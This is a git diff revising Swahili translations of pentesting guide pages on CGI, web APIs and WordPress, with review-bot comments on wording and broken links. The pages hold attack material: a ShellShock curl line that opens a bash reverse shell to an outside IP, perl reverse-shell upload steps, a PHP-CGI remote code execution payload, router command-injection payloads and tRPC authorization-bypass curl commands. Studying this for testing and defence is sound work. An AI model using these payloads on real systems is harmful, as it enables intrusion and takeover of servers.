@@ -1493,15 +1490,15 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md ## VMware Tools service discovery LPE (CWE-426) via regex-based exec (CVE-2025-41244) -Regex-driven service discovery katika VMware Tools/Aria Operations inaweza kutoa binary path kutoka kwenye process command lines na kuiendesha na -v chini ya privileged context. Patterns zinazoruhusu (mfano, using \S) zinaweza kumfananisha listener aliyestaged na mshambuliaji katika writable locations (mfano, /tmp/httpd), zikisababisha execution kama root (CWE-426 Untrusted Search Path). +Regex-driven service discovery in VMware Tools/Aria Operations can extract a binary path from process command lines and execute it with -v under a privileged context. Permissive patterns (e.g., using \S) may match attacker-staged listeners in writable locations (e.g., /tmp/httpd), leading to execution as root (CWE-426 Untrusted Search Path). -Jifunze zaidi na uone generalized pattern inayoweza kutumika kwa discovery/monitoring stacks nyingine hapa: +Jifunze zaidi na ona pattern jumla inayoweza kutumika kwa discovery/monitoring stacks nyingine hapa: {{#ref}} vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md {{#endref}} -## Kernel Security Protections +## Ulinzi wa Usalama wa Kernel - [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check) - [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md index 0e5d60364..44d748fd0 100644 --- a/src/network-services-pentesting/pentesting-web/cgi.md +++ b/src/network-services-pentesting/pentesting-web/cgi.md 
@@ -3,22 +3,22 @@ {{#include ../../banners/hacktricks-training.md}} -## Maelezo +## Taarifa -The **CGI scripts are perl scripts**, hivyo, ikiwa ume-compromise server inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **kubadilisha extension** kutoka **.pl** hadi **.cgi**, kutoa **execute permissions** \(`chmod +x`\) na **kupata** reverse shell **kutoka kwenye web browser** ili kuitekeleza. -Ili kujaribu **CGI vulns** inashauriwa kutumia `nikto -C all` \(and all the plugins\) +The **CGI scripts are perl scripts**, hivyo, ikiwa umepata udhibiti wa server inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia a perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **kubadilisha extension** kutoka **.pl** hadi **.cgi**, kumpa **execute permissions** \(`chmod +x`\) na **kupata** reverse shell **kutoka kwa web browser** ili kuitekeleza. +Ili kujaribu kwa **CGI vulns** inashauriwa kutumia `nikto -C all` \(na plugins zote\) ## **ShellShock** -**ShellShock** ni udhaifu unaoathiri kwa kiasi kikubwa **Bash** command-line shell katika mifumo ya uendeshaji inayotegemea Unix. Unalenga uwezo wa Bash wa kuendesha amri zinazotumwa na applications. Udhaifu upo katika udhibiti wa **environment variables**, ambazo ni thamani zilizopewa majina zinazoendelea (dynamic) ambazo huathiri jinsi michakato inavyotekelezwa kwenye kompyuta. Washambuliaji wanaweza kutumia hili kwa kuambatisha **malicious code** kwenye environment variables, ambayo itaendeshwa wakati variable inapopokelewa. Hii inawawezesha washambuliaji ku-compromise mfumo. +**ShellShock** ni **vulnerability** inayogusa shell ya amri inayotumika sana **Bash** katika mifumo ya uendeshaji ya Unix-based. Inalenga uwezo wa Bash kutekeleza amri zinazopitishwa na applications. 
Udhaifu uko katika udhibiti wa **environment variables**, ambazo ni thamani zilizopewa majina zinazobadilika na zinaathiri jinsi process zinavyotekelezwa kwenye kompyuta. Washambuliaji wanaweza kutengeneza udhaifu huu kwa kuambatanisha **msimbo hatari** kwenye environment variables, ambao hutekelezwa wakati variable inapopokelewa. Hii inamruhusu mshambuliaji kuathiri mfumo. -Kutumia udhaifu huu, **ukurasa unaweza kurudisha kosa**. +Kwa kutumia udhaifu huu **ukurasa unaweza kurudisha kosa**. -Unaweza **kupata** udhaifu huu ukiangalia kuwa unatumia **old Apache version** na **cgi_mod** \(with cgi folder\) au kwa kutumia **nikto**. +Unaweza **kupata** udhaifu huu kwa kuona kuwa inatumia **old Apache version** na **cgi_mod** \(na cgi folder\) au kwa kutumia **nikto**. -### **Jaribu** +### **Test** -Vipimo vingi vinategemea ku-echo kitu na kutegemea kwamba mnyororo huo utarudishwa katika majibu ya wavuti. Ikiwa unaamini ukurasa unaweza kuwa dhaifu, tafuta kurasa zote za cgi na uziteste. +Mitihani mingi inategemea kutoa echo ya kitu na kutarajia kwamba mnyororo huo urudi katika response ya web. Ikiwa unadhani ukurasa unaweza kuwa vulnerable, tafuta kurasa zote za cgi na zipime. **Nmap** ```bash 
@@ -51,17 +51,17 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt > set rhosts 10.1.2.11 > run ``` -## Dispatchers za CGI zilizo katikati (routing ya endpoint moja kupitia selector parameters) +## Wasambazaji wa CGI waliowekwa kati (single endpoint routing via selector parameters) -Mengi ya embedded web UIs huweka pamoja (multiplex) vitendo vingi vyenye ruhusa nyuma ya endpoint moja ya CGI (kwa mfano, `/cgi-bin/cstecgi.cgi`) na hutumia selector parameter kama `topicurl=` ku-routing ombi kwa function ya ndani. +UI nyingi za wavuti zilizojengewa ndani huunganisha vitendo vingi vyenye ruhusa nyuma ya single CGI endpoint (kwa mfano, `/cgi-bin/cstecgi.cgi`) na hutumia selector parameter kama `topicurl=` kupeleka ombi kwa kazi ya ndani. -Mbinu za ku-exploit routers hizi: +Mbinu za kuchukua faida ya router hizi: -- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, au unpack firmware na grep kwa handler strings zinazotumika na dispatcher. -- Test unauthenticated reachability: baadhi ya handlers husahau auth checks na zinaweza kupatikana moja kwa moja. -- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`. +- Orodhesha majina ya handler: scrape JS/HTML, brute-force kwa wordlists, au unpack firmware na grep kwa handler strings zinazotumiwa na dispatcher. +- Jaribu ufikikaji bila uthibitisho (unauthenticated reachability): baadhi ya handlers huzisahau cheki za auth na zinaweza kuitwa moja kwa moja. +- Lenga handlers zinazowaita system utilities au kugusa files; validators dhaifu mara nyingi huwazuia herufi chache tu na huenda ikakosa hyphen ya mwanzoni `-`. -Generic exploit shapes: +Aina za generic exploit: ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Content-Type: application/x-www-form-urlencoded 
@@ -75,30 +75,29 @@ topicurl=setEasyMeshAgentCfg&agentName=;id; # 3) Validator bypass → arbitrary file write in file-touching handlers topicurl=setWizardCfg&=/etc/init.d/S99rc ``` -Detection and hardening: +Utambuzi na kuimarisha usalama: -- Angalia ombi zisizo za kuthibitishwa kwa centralized CGI endpoints zikiwa na `topicurl` imewekwa kwa sensitive handlers. -- Flag vigezo vinavyoanza na `-` (argv option injection attempts). -- Wauzaji: lazimisha authentication kwa state-changing handlers zote, validate kwa kutumia strict allowlists/types/lengths, na kamwe usipitishe user-controlled strings kama command-line flags. +- Angalia maombi yasiyo na uthibitisho kwa endpoints za CGI za kati na `topicurl` imewekwa kwa handlers nyeti. +- Tambua vigezo vinavyoanza na `-` (jaribio la argv option injection). +- Wauzaji: weka uthibitisho kwa handlers zote zinazobadilisha state, thibitisha kwa kutumia allowlists/aina/urefu kali, na kamwe usipitishe nyuzi zilizo chini ya udhibiti wa mtumiaji kama command-line flags. ## PHP ya zamani + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) -Kwa ujumla, ikiwa cgi imewezeshwa na php ni "old" \(<5.3.12 / < 5.4.2\) unaweza execute code. -Ili exploit ugani huu unahitaji kufikia faili fulani ya PHP ya web server bila kutuma parameters \(hasa bila kutuma tabia "="\). -Kisha, kwa kujaribu ugani huu, unaweza kufikia kwa mfano `/index.php?-s` \(tazama `-s`\) na **source code ya application itaonekana katika response**. +Kwa kifupi, ikiwa cgi iko active na php ni "old" \(<5.3.12 / < 5.4.2\) unaweza execute code. +Ili ku-exploit hii vulnerability unahitaji kufikia baadhi ya faili za PHP za web server bila kutuma parameters \(hasa bila kutuma tabia "="\). +Kisha, ili kujaribu hii vulnerability, unaweza kufikia kwa mfano `/index.php?-s` \(angalia `-s`\) na **source code ya application itaonekana kwenye response**. 
-Kisha, ili kupata **RCE** unaweza kutuma query maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **PHP code** itakayotekelezwa iko katika **body ya request**. -Example: +Kisha, ili kupata **RCE** unaweza kutuma query maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **PHP code** itakayotekelezwa iko katika **mwili wa request. Mfano:** ```bash curl -i --data-binary "" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" ``` -**Taarifa zaidi kuhusu vuln na exploits zinazowezekana:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** +**Taarifa zaidi kuhusu vuln na possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** ## **Proxy \(MitM to Web server requests\)** -CGI inaunda environment variable kwa kila header katika http request. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com" +CGI huunda variable ya mazingira kwa kila header katika http request. Kwa mfano: "host:web.com" huundwa kama "HTTP_HOST"="web.com" -Kwa kuwa HTTP_PROXY variable inaweza kutumika na web server. Jaribu kutuma **header** inayoonyesha: "**Proxy: <IP_attacker>:<PORT>**". Ikiwa server itafanya ombi lolote wakati wa session, utaweza kunasa kila ombi litakalo fanywa na server. +Kwa kuwa variable ya HTTP_PROXY inaweza kutumika na web server. 
Jaribu kutuma **header** yenye: "**Proxy: <IP_attacker>:<PORT>**" na ikiwa server itafanya ombi lolote wakati wa session, utaweza kunasa kila ombi linalofanywa na server. ## **Marejeo** diff --git a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md index 604ddaabc..52828f5ff 100644 --- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md +++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md 
@@ -2,54 +2,96 @@ {{#include ../../banners/hacktricks-training.md}} -## API Pentesting Methodology Summary +## Muhtasari wa Mbinu za API Pentesting -Pentesting APIs inahusisha njia iliyopangwa ya kugundua udhaifu. Mwongo huu unajumuisha mbinu kamili, ukisisitiza mbinu na zana za vitendo. +Pentesting APIs inahitaji mbinu iliyo na muundo ili kubaini udhaifu. Mwongozo huu unafupisha mbinu kamili, ukisisitiza mbinu za vitendo na zana. -### **Understanding API Types** +### **Kuelewa Aina za API** -- **SOAP/XML Web Services**: Tumia muundo wa WSDL kwa ajili ya nyaraka, mara nyingi hupatikana kwenye njia za `?wsdl`. Zana kama **SOAPUI** na **WSDLer** (Burp Suite Extension) ni muhimu kwa ajili ya kuchambua na kuunda maombi. Mfano wa nyaraka unapatikana kwenye [DNE Online](http://www.dneonline.com/calculator.asmx). -- **REST APIs (JSON)**: Nyaraka mara nyingi zinakuja katika faili za WADL, lakini zana kama [Swagger UI](https://swagger.io/tools/swagger-ui/) zinatoa kiolesura rahisi zaidi kwa ajili ya mwingiliano. **Postman** ni zana muhimu kwa ajili ya kuunda na kusimamia maombi ya mfano. -- **GraphQL**: Lugha ya kuhoji kwa APIs inatoa maelezo kamili na yanayoeleweka kuhusu data katika API yako. +- **SOAP/XML Web Services**: Tumia format ya WSDL kwa dokumenti, kawaida hupatikana kwenye path za `?wsdl`. Zana kama **SOAPUI** na **WSDLer** (Burp Suite Extension) ni muhimu kwa kusoma na kuunda requests. Mfano wa dokumenti upo kwenye [DNE Online](http://www.dneonline.com/calculator.asmx). +- **REST APIs (JSON)**: Dokumenti mara nyingi hutolewa kama faili za WADL, lakini zana kama [Swagger UI](https://swagger.io/tools/swagger-ui/) zinatoa interface rahisi kwa kuingiliana. **Postman** ni zana muhimu kwa kuunda na kusimamia mifano ya requests. +- **GraphQL**: Lugha ya query kwa APIs inayotoa maelezo kamili na yanayoweza kueleweka ya data iliyopo kwenye API yako. 
-### **Practice Labs** +### **Maabara za Mazoezi** -- [**VAmPI**](https://github.com/erev0s/VAmPI): API yenye udhaifu wa makusudi kwa ajili ya mazoezi ya vitendo, ikifunika udhaifu wa juu 10 wa API wa OWASP. +- [**VAmPI**](https://github.com/erev0s/VAmPI): API iliyoundwa kwa makusudi kuwa na udhaifu kwa mazoezi ya vitendo, ikifunika OWASP top 10 API vulnerabilities. -### **Effective Tricks for API Pentesting** +### **Mbinu Madhubuti za API Pentesting** -- **SOAP/XML Vulnerabilities**: Chunguza udhaifu wa XXE, ingawa matangazo ya DTD mara nyingi yanapigwa marufuku. Mifumo ya CDATA inaweza kuruhusu kuingiza payload ikiwa XML inabaki kuwa halali. -- **Privilege Escalation**: Jaribu mwisho wa huduma zenye viwango tofauti vya ruhusa ili kubaini uwezekano wa ufikiaji usioidhinishwa. -- **CORS Misconfigurations**: Chunguza mipangilio ya CORS kwa uwezekano wa kutumiwa kupitia mashambulizi ya CSRF kutoka kwa vikao vilivyoidhinishwa. -- **Endpoint Discovery**: Tumia mifumo ya API kugundua mwisho wa huduma zilizofichwa. Zana kama fuzzers zinaweza kuharakisha mchakato huu. -- **Parameter Tampering**: Jaribu kuongeza au kubadilisha vigezo katika maombi ili kufikia data au kazi zisizoidhinishwa. -- **HTTP Method Testing**: Badilisha mbinu za maombi (GET, POST, PUT, DELETE, PATCH) ili kugundua tabia zisizotarajiwa au ufichuzi wa taarifa. -- **Content-Type Manipulation**: Badilisha kati ya aina tofauti za maudhui (x-www-form-urlencoded, application/xml, application/json) ili kujaribu matatizo ya uchambuzi au udhaifu. -- **Advanced Parameter Techniques**: Jaribu na aina zisizotarajiwa za data katika payloads za JSON au cheza na data za XML kwa ajili ya XXE injections. Pia, jaribu uchafuzi wa vigezo na wahusika wa wildcard kwa ajili ya majaribio mapana. -- **Version Testing**: Toleo la zamani la API linaweza kuwa na uwezekano mkubwa wa kushambuliwa. Daima angalia na jaribu dhidi ya matoleo mengi ya API. 
+- **SOAP/XML Vulnerabilities**: Chunguza XXE vulnerabilities, ingawa DTD declarations mara nyingi huwekewa vizuizi. CDATA tags zinaweza kuruhusu kuingiza payload ikiwa XML inabaki kuwa halali. +- **Privilege Escalation**: Jaribu endpoints kwa viwango tofauti vya vibali ili kubaini uwezekano wa ufikiaji usioidhinishwa. +- **CORS Misconfigurations**: Chunguza mipangilio ya CORS kwa uwezekano wa kutumiwa kupitia CSRF attacks kutoka kwa session zilizo authenticate-ikiwa. +- **Endpoint Discovery**: Tumia pattern za API kugundua endpoints zilizofichwa. Zana kama fuzzers zinaweza kuendesha mchakato huu kiotomatiki. +- **Parameter Tampering**: Jaribu kuongeza au kubadilisha parameters katika requests ili kupata data au functionalities zisizoidhinishwa. +- **HTTP Method Testing**: Badilisha methods za request (GET, POST, PUT, DELETE, PATCH) ili kugundua tabia zisizotarajiwa au ufunuo wa taarifa. +- **Content-Type Manipulation**: Badilisha kati ya content types tofauti (x-www-form-urlencoded, application/xml, application/json) kujaribu masuala ya parsing au udhaifu. +- **Advanced Parameter Techniques**: Jaribu aina za data zisizotarajiwa katika JSON payloads au cheza na data za XML kwa XXE injections. Pia, jaribu parameter pollution na wildcard characters kwa upimaji mpana. +- **Version Testing**: Toleo za zamani za API zinaweza kuwa nyeti zaidi kwa mashambulizi. Daima angalia na upime dhidi ya matoleo mengi ya API. -### **Tools and Resources for API Pentesting** +### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls -- [**kiterunner**](https://github.com/assetnote/kiterunner): Nzuri kwa ajili ya kugundua mwisho wa API. Tumia kuangalia na kujaribu nguvu njia na vigezo dhidi ya APIs lengwa. +Stack za kisasa za TypeScript mara nyingi hutumia tRPC pamoja na Zod kwa validation ya input. 
Katika tRPC, `protectedProcedure` kawaida inahakikisha request ina session halali (authentication) lakini haimaanishi mwito una haki ya role/vipengele (authorization). Mchanganyiko huu unaweza kusababisha Broken Function Level Authorization/BOLA ikiwa procedures nyeti zimefungwa tu kwa `protectedProcedure`. + +- Threat model: Mtumiaji yeyote aliye authenticate lakini mwenye vibali vya chini anaweza kusababisha procedures za daraja la admin ikiwa ukaguzi wa role haupo (mfano, background migrations, feature flags, tenant-wide maintenance, job control). +- Black-box signal: `POST /api/trpc/.` endpoints ambazo zinafanikiwa kwa akaunti za kawaida wakati zinapaswa kuwa kwa admin tu. Self-serve signups huongeza kwa kiasi kikubwa uwezekano wa kutumika. +- Typical tRPC route shape (v10+): JSON body imefungwa chini ya `{"input": {...}}`. + +Example vulnerable pattern (no role/permission gate): +```ts +// The endpoint for retrying a migration job +// This checks for a valid session (authentication) +retry: protectedProcedure +// but not for an admin role (authorization). +.input(z.object({ name: z.string() })) +.mutation(async ({ input, ctx }) => { +// Logic to restart a sensitive migration +}), +``` +Utekelezaji wa vitendo (black-box) + +1) Sajili akaunti ya kawaida na upate sesi iliyothibitishwa (cookies/headers). +2) Orodhesha background jobs au rasilimali nyeti kupitia taratibu za “list”/“all”/“status”. 
+```bash +curl -s -X POST 'https:///api/trpc/backgroundMigrations.all' \ +-H 'Content-Type: application/json' \ +-b '' \ +--data '{"input":{}}' +``` +3) Tekeleza vitendo vya kibali kama kuanzisha upya job: +```bash +curl -s -X POST 'https:///api/trpc/backgroundMigrations.retry' \ +-H 'Content-Type: application/json' \ +-b '' \ +--data '{"input":{"name":""}}' +``` +Impact to assess + +- Uharibifu wa data kutokana na uanzishaji upya usio-idempotent: Kuamsha utekelezaji sambamba wa migrations/workers kunaweza kusababisha race conditions na hali zisizoendelevu kwa sehemu (kupotea kwa data bila ishara, analytics zilizoharibika). +- DoS via worker/DB starvation: Kurudia kuanzisha kazi nzito kunaweza kuchosha worker pools na muunganisho wa database, kusababisha kuzimwa kwa huduma kwa wapangaji wote. + +### **Vifaa na Rasilimali kwa API Pentesting** + +- [**kiterunner**](https://github.com/assetnote/kiterunner): Inafaa sana kwa kugundua API endpoints. Itumie kufanya scan na brute force paths na parameters dhidi ya API lengwa. ```bash kr scan https://domain.com/api/ -w routes-large.kite -x 20 kr scan https://domain.com/api/ -A=apiroutes-220828 -x 20 kr brute https://domain.com/api/ -A=raft-large-words -x 20 -d=0 kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0 ``` -- [**https://github.com/BishopFox/sj**](https://github.com/BishopFox/sj): sj ni zana ya mistari ya amri iliyoundwa kusaidia katika ukaguzi wa **faili za ufafanuzi za Swagger/OpenAPI zilizofichuliwa** kwa kuangalia mwisho wa API zinazohusiana kwa uthibitisho dhaifu. Pia inatoa templeti za amri kwa ajili ya kupima udhaifu kwa mikono. -- Zana za ziada kama **automatic-api-attack-tool**, **Astra**, na **restler-fuzzer** zinatoa kazi maalum za kupima usalama wa API, kuanzia simulating shambulio hadi fuzzing na skanning ya udhaifu. -- [**Cherrybomb**](https://github.com/blst-security/cherrybomb): Ni zana ya usalama wa API inayokagua API yako kulingana na faili ya OAS (zana hiyo imeandikwa kwa rust). 
+- [**https://github.com/BishopFox/sj**](https://github.com/BishopFox/sj): sj ni zana ya mstari wa amri iliyoundwa kusaidia ukaguzi wa **faili za ufafanuzi za Swagger/OpenAPI zilizo wazi** kwa kukagua API endpoints zinazohusiana kwa uthibitishaji dhaifu. Pia hutoa templates za amri kwa ajili ya upimaji wa udhaifu kwa mkono. +- Zana nyingine kama **automatic-api-attack-tool**, **Astra**, na **restler-fuzzer** zinatoa vipengele vilivyobinafsishwa kwa ajili ya upimaji wa usalama wa API, kuanzia kuiga mashambulizi hadi fuzzing na uchunguzi wa udhaifu. +- [**Cherrybomb**](https://github.com/blst-security/cherrybomb): Ni zana ya usalama ya API inayokagua API yako kwa msingi wa faili ya OAS (zana imeandikwa kwa Rust). ### **Rasilimali za Kujifunza na Mazoezi** - **OWASP API Security Top 10**: Kusoma muhimu kwa kuelewa udhaifu wa kawaida wa API ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)). -- **API Security Checklist**: Orodha kamili ya kuhakikisha usalama wa APIs ([GitHub link](https://github.com/shieldfy/API-Security-Checklist)). -- **Logger++ Filters**: Kwa ajili ya kuwinda udhaifu wa API, Logger++ inatoa filters muhimu ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)). -- **API Endpoints List**: Orodha iliyochaguliwa ya mwisho wa API zinazoweza kutumika kwa madhumuni ya kupima ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)). +- **API Security Checklist**: Orodha kamili ya ukaguzi kwa ajili ya usalama wa API ([GitHub link](https://github.com/shieldfy/API-Security-Checklist)). +- **Logger++ Filters**: Kwa kuwinda udhaifu wa API, Logger++ inatoa vichujio muhimu ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)). +- **API Endpoints List**: Orodha iliyochaguliwa ya endpoints za API zinazowezekana kwa madhumuni ya upimaji ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)). 
-## Marejeleo +## Marejeo - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire) +- [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index d0503929f..05ccea886 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md 
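Review bot: the heading rename `-## Marejeleo` / `+## Marejeo` changes the auto-generated anchor of the references section, so any cross-reference elsewhere in the book that points at the old `#marejeleo` slug will break; either keep the old heading or check for inbound links before merging. In the same file the new trpc curl examples are shown with an empty host (`https:///api/trpc/backgroundMigrations.all`) and an empty cookie (`-b ''`), so they fail as written; mark the missing values with explicit placeholders instead of leaving them blank. The added sub-heading `Impact to assess` is also left in English while the two bullets under it are in Swahili.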
@@ -4,49 +4,49 @@ ## Taarifa za Msingi -- **Faili zilizopakiwa** huenda kwa: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt` -- **Faili za theme zinaweza kupatikana katika /wp-content/themes/,** hivyo ukibadilisha php ya theme ili kupata RCE labda utatumia path hiyo. Kwa mfano: Kwa kutumia **theme twentytwelve** unaweza **kupata** faili ya **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) +- **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt` +- **Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) -- **URL nyingine yenye manufaa inaweza kuwa:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) +- **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) -- Katika **wp-config.php** unaweza kupata nenosiri la root la database. -- Njia za kuingia za default za kuangalia: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_ +- Katika **wp-config.php** unaweza kupata password ya root ya database. +- Njia za kuingia za default za kuchunguza: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_ -### **Main WordPress Files** +### **Faili Muhimu za WordPress** - `index.php` -- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosanidiwa. -- `wp-activate.php` inatumika kwa mchakato wa uanzishaji wa barua pepe wakati wa kuweka tovuti mpya ya WordPress. -- Folda za login (zinaweza kubadilishwa jina ili kuficha): +- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosanikishwa. 
+- `wp-activate.php` inatumika kwa mchakato wa uthibitisho wa email wakati wa kuanzisha tovuti mpya ya WordPress. +- Folda za login (zinaweza kubadilishwa jina ili kuzificha): - `/wp-admin/login.php` - `/wp-admin/wp-login.php` - `/login.php` - `/wp-login.php` -- `xmlrpc.php` ni faili inayowakilisha kipengele cha WordPress kinachoruhusu data kutumwa kutumia HTTP kama njia ya usafirishaji na XML kama mbinu ya enkoding. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference). -- Folda ya `wp-content` ni saraka kuu ambapo plugins na themes zinahifadhiwa. -- `wp-content/uploads/` Ni saraka ambayo faili zote zinazopakiwa kwenye jukwaa zinalindwa. -- `wp-includes/` Hii ni saraka ambapo faili za kernel zinahifadhiwa, kama certificates, fonts, faili za JavaScript, na widgets. -- `wp-sitemap.xml` Katika matoleo ya WordPress 5.5 na zaidi, WordPress huzalisha faili ya sitemap XML yenye machapisho yote ya umma na aina za post na taxonomies zinazoweza kuhojiwa hadharani. +- `xmlrpc.php` ni faili inayowakilisha kipengele cha WordPress kinachowezesha data kutumwa kwa kutumia HTTP kama mekanisma ya usafirishaji na XML kama mekanisma ya ufafanuzi. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference). +- Kabrasha la `wp-content` ndilo saraka kuu ambapo plugins na themes zinahifadhiwa. +- `wp-content/uploads/` ni saraka ambapo faili zote zilizopakiwa kwenye jukwaa zinahifadhiwa. +- `wp-includes/` Hii ni saraka ambapo faili za msingi zinahifadhiwa, kama vyeti, fonts, faili za JavaScript, na widgets. +- `wp-sitemap.xml` Katika toleo la WordPress 5.5 na zaidi, WordPress inazalisha faili ya sitemap XML yenye machapisho yote ya umma na aina za posti zinazoweza kuombwa hadharani na taxonomies. 
**Post exploitation** -- Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, database host, username na password, authentication keys and salts, na prefix ya jedwali la database. Faili hii ya configuration pia inaweza kutumika kuwasha DEBUG mode, ambayo inaweza kusaidia katika kutatua matatizo. +- The `wp-config.php` file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting. -### Ruhusa za Watumiaji +### Ruhusa za watumiaji - **Administrator** - **Editor**: Kuchapisha na kusimamia machapisho yake na ya wengine - **Author**: Kuchapisha na kusimamia machapisho yake mwenyewe - **Contributor**: Kuandika na kusimamia machapisho yake lakini hawezi kuyachapisha -- **Subscriber**: Kuangalia machapisho na kuhariri wasifu wao +- **Subscriber**: Kusoma machapisho na kuhariri wasifu wao -## **Passive Enumeration** +## **Uchunguzi wa Kiasili** -### **Get WordPress version** +### **Pata toleo la WordPress** Angalia kama unaweza kupata faili `/license.txt` au `/readme.html` -Ndani ya **msimbo wa chanzo** wa ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)): +Ndani ya **source code** ya ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)): - grep ```bash @@ -56,7 +56,7 @@ curl https://victim.com/ | grep 'content="WordPress' ![](<../../images/image (1111).png>) -- Faili za viungo vya CSS +- Faili za link za CSS ![](<../../images/image (533).png>) 
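Review bot: the @@ -4,49 hunk reverts several already translated lines to English, e.g. `-- **Faili zilizopakiwa** huenda kwa:` becomes `+- **Uploaded** files go to:` and the wp-config.php post-exploitation bullet becomes `+- The wp-config.php file contains information required by WordPress ...`, so the Swahili page now switches language paragraph by paragraph; keep the Swahili text and apply only the wording fixes. The new English bullet also carries a grammar error (`which can useful in troubleshooting` is missing "be"). Two wording regressions in the translated lines: `enkoding` became `mekanisma ya ufafanuzi`, which reads as "explanation mechanism" rather than "encoding mechanism", and `## **Passive Enumeration**` became `## **Uchunguzi wa Kiasili**` ("natural enumeration"); "passive" needs a different word. While here, the `default/404.php` bullet links to `/wp-content/themes/twentytwelve/404.php` on both the old and the new line, so link text and target disagree.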
@@ -72,44 +72,44 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp ```bash curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2 ``` -### Chota matoleo kwa ujumla +### Kutoa matoleo kwa ujumla ```bash curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2 ``` -## Uorodhesaji hai +## Active enumeration -### Plugins and Themes +### Plugins na Themes -Labda hautaweza kupata Plugins na Themes zote zinazowezekana. Ili kugundua zote, utahitaji **Brute Force kwa vitendo orodha ya Plugins na Themes** (kwa bahati nzuri kwetu zipo zana za kiotomatiki ambazo zina orodha hizi). +Huenda hautaweza kupata Plugins na Themes zote zinazowezekana. Ili kuzitambua zote, utahitaji **actively Brute Force a list of Plugins and Themes** (tumaini letu ni 